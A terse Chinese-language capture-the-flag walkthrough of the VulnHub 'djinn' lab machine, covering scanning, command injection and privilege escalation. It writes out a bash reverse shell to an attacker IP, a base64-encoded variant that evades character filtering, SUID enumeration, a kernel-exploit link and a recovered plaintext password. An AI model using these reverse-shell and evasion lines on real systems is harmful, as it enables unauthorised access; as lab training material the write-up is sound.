靶机下载连接:shell
https://download.vulnhub.com/djinn/djinn.ovabash
主机端口扫描:tcp
FTP发现一些文件提示编码
1337端口是一个游戏,去看下server
哈哈有点难,暂时放弃,看看7331HTTP server 这边有么有发现blog
使用dirb dirsearch 自带字典没有发现,加大字段枚举下目录游戏
命令执行ip
反弹shell bash -i >& /dev/tcp/10.10.202.142/1234 0>&1一直弹不出来,猜想特殊字符作了过滤terminal
base64 编码执行cmd
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4yMDIuMTQyLzEyMzQgMD4mMQ== | base64 -d | bash
接下来进行提权操做
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
内核:Linux djinn 4.15.0-66-generic
exp提权失败:https://www.exploit-db.com/download/47163
路径/home/nitish/.dev/creds.txt
nitish:p4ssw0rdStr3r0n9 密码
切换用户可能会提示:su: must be run from a terminal
执行此命令:/usr/bin/script -qc /bin/bash /dev/null
sudo - u sam genie -cmd new
OVER!!